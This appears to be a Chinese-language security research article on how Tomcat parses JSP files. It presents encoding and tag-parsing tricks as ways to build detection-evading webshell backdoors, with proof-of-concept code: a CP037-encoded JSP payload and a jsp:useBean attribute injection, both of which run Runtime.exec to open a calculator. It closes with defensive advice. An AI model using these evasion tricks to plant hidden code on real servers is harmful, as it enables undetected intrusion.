JSP解析过程及其Trick点深入分析<\/h1>

一、JSP解析过程概述<\/h2>

Tomcat解析JSP的过程主要分为以下几个步骤：<\/p>

客户端发送请求到服务器<\/li>
服务器接收到请求，并交给Servlet容器处理<\/li>
Servlet容器解析JSP文件，并将其转换为Java代码<\/li>
Servlet容器编译Java代码，并生成class文件<\/li>
Servlet容器加载class文件，并执行其中的代码<\/li>

服务器将处理结果返回给客户端<\/li> <\/ol>

二、JSP解析详细过程<\/h2>

1. JSP文件到Java代码的转换<\/h3>

当请求到来时，Tomcat调用JspServlet进行解析，主要经历以下阶段：<\/p>

generate java<\/strong>：将JSP转换为Java代码<\/li>

generate class<\/strong>：将Java代码编译为class文件<\/li> <\/ol>
在generate java过程中，会对编码进行特殊处理，这是免杀后门可以利用的关键点。<\/p>
2. 编码探测与处理<\/h3>
Tomcat通过determineSyntaxAndEncoding<\/code>函数进行编码探测：<\/p>
\/\/ EncodingDetector中调用了ProcessBom来处理流 <\/span><\/span><\/span>\/\/ 后续赋值到sourceEnc中 <\/span><\/span><\/span><\/span>if<\/span> (<\/span>isXml)<\/span> {<\/span> <\/span><\/span> return<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>JspReader jspReader =<\/span> null<\/span>;<\/span> <\/span><\/span>try<\/span> {<\/span> <\/span><\/span> jspReader =<\/span> new<\/span> JspReader(<\/span>ctxt,<\/span> absFileName,<\/span> sourceEnc,<\/span> jar,<\/span> err);<\/span> <\/span><\/span>}<\/span> catch<\/span> (<\/span>FileNotFoundException ex)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> JasperException(<\/span>ex);<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>Mark startMark =<\/span> jspReader.<\/span>mark<\/span>();<\/span> <\/span><\/span>if<\/span> (!<\/span>isExternal)<\/span> {<\/span> <\/span><\/span> jspReader.<\/span>reset<\/span>(<\/span>startMark);<\/span> <\/span><\/span> if<\/span> (<\/span>hasJspRoot(<\/span>jspReader))<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>revert)<\/span> {<\/span> <\/span><\/span> sourceEnc =<\/span> "UTF-8"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> isXml =<\/span> true<\/span>;<\/span> <\/span><\/span> return<\/span>;<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>revert &&<\/span> isBomPresent)<\/span> {<\/span> <\/span><\/span> sourceEnc =<\/span> "UTF-8"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> isXml =<\/span> false<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>if<\/span> (!<\/span>isBomPresent)<\/span> {<\/span> <\/span><\/span> sourceEnc =<\/span> jspConfigPageEnc;<\/span> <\/span><\/span> if<\/span> (<\/span>sourceEnc ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> sourceEnc =<\/span> getPageEncodingForJspSyntax(<\/span>jspReader,<\/span> startMark);<\/span> <\/span><\/span> if<\/span> (<\/span>sourceEnc ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> \/\/ Default to "ISO-8859-1" per JSP spec <\/span><\/span><\/span><\/span> sourceEnc =<\/span> "ISO-8859-1"<\/span>;<\/span> <\/span><\/span> isDefaultPageEncoding =<\/span> true<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>关键点：<\/p> 如果是jspx文件(isXml=true)，直接返回<\/li> 对于jsp文件，会进一步处理<\/li> 如果没有BOM头(!isBomPresent)，会从page指令中获取编码<\/li> <\/ul> 3. JSP和JSPX的不同处理<\/h3> if<\/span> (<\/span>isXml)<\/span> {<\/span> <\/span><\/span> return<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span>\/\/ 后续处理jsp文件 <\/span><\/span><\/span><\/code><\/pre>JSPX文件会直接返回，而JSP文件会继续处理。<\/p> 三、编码特性利用<\/h2> 1. CP037编码利用<\/h3> CP037编码在读取后会变成<?xm<\/code>，可以利用这个特性构造闭合标签：<\/p> package<\/span> org.example;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.IOException;<\/span> <\/span><\/span>import<\/span> java.io.UnsupportedEncodingException;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> test<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> String bytesToHex<\/span>(<\/span>byte<\/span>[]<\/span> bytes)<\/span> {<\/span> <\/span><\/span> StringBuilder hexBuilder =<\/span> new<\/span> StringBuilder();<\/span> <\/span><\/span> for<\/span> (<\/span>byte<\/span> b :<\/span> bytes)<\/span> {<\/span> <\/span><\/span> hexBuilder.<\/span>append<\/span>(<\/span>String.<\/span>format<\/span>(<\/span>"%02X"<\/span>,<\/span> b));<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> hexBuilder.<\/span>toString<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> byte<\/span>[]<\/span> GetBytes<\/span>(<\/span>String s)<\/span> throws<\/span> UnsupportedEncodingException {<\/span> <\/span><\/span> byte<\/span>[]<\/span> ibm290s =<\/span> s.<\/span>getBytes<\/span>(<\/span>"cp037"<\/span>);<\/span> <\/span><\/span> return<\/span> ibm290s;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> byte<\/span>[]<\/span> bytes =<\/span> GetBytes(<\/span>"<?xml><%@page pageEncoding=\"cp037\"%><%Runtime.getRuntime().exec(\"open -a calculator\");%>"<\/span>);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>bytesToHex(<\/span>bytes));<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 编码适配技巧<\/h3> 由于JSP本身是基于HTML的模板语言，可以利用HTML特性构造特殊编码：<\/p> <%@page pageEncoding="utf-8"%> <\/code><\/pre> 四、AST生成与校验<\/h2> 1. generate java过程<\/h3> 预解析Opcode<\/strong>：将import、include、taglib等进行解析<\/li> 遍历AST语法树进行校验<\/strong><\/li> 正式解析Opcode<\/strong>：解析标签如<<\/code><\/li> 再次遍历AST语法树进行校验<\/strong><\/li> 遍历AST语法树生成Java代码<\/strong><\/li> <\/ol> 2. 校验机制<\/h3> AST的实现主要通过generateVisitor<\/code>实现，使用StringBuilder<\/code>写入，最后生成Java代码。如果校验不通过，会直接throw error，不会生成.java文件。<\/p> 五、恶意代码注入技巧<\/h2> 1. useBean标签利用<\/h3> <jsp:useBean><\/code>标签的解析过程：<\/p> 拿到每个属性<\/li> 通过classLoader寻找class<\/li> 反射获取无参构造方法<\/li> <\/ol> 利用方式：<\/p> <jsp:useBean id="a=null;java.lang.Runtime.getRuntime().exec(\"open -a calculator\");\/*" class="org.aa.test"\/> <%*\/ out.print(1);%> <\/code><\/pre> 2. 其他Trick点<\/h3> 编码不一致绕过<\/strong>：让JSP文件编码和pageencoding不一致<\/li> skipspace函数利用<\/strong>：AST树生成过程中会判断是否为ascii<32，可利用此特性绕过<\/li> <\/ol> 六、防御建议<\/h2> 严格校验JSP文件内容<\/li> 限制上传文件类型<\/li> 监控异常编码的JSP文件<\/li> 定期更新Tomcat版本<\/li> 对JSP文件进行静态分析<\/li> <\/ol> 七、总结<\/h2> Tomcat解析JSP的过程涉及编码探测、AST生成和校验等多个环节，每个环节都可能存在可利用的点。理解这些机制不仅有助于安全研究，也能帮助开发者编写更安全的JSP应用。<\/p>